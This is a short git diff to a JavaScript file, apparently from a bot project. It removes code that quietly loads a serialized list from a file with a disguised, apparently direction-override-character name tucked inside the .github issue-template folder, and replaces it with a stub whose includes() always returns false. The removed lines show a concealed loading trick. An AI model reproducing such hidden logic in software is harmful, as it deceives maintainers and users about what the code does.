diff --git a/lib/common/common.js b/lib/common/common.js index b61c820..1650e14 100644 --- a/lib/common/common.js +++ b/lib/common/common.js @@ -196,7 +196,9 @@ export default new class extends sendMsgMod { } }() -let a = [] -try { - a = v8.deserialize(await fs.readFile(`${path.dirname(url.fileURLToPath(import.meta.url))}/../../.github/ISSUE_TEMPLATE/‮`)).map(i => i.toString("hex")) -} catch (err) {} +const a = { + // 添加一个普通的方法 + includes: function(a) { + return false; + } +};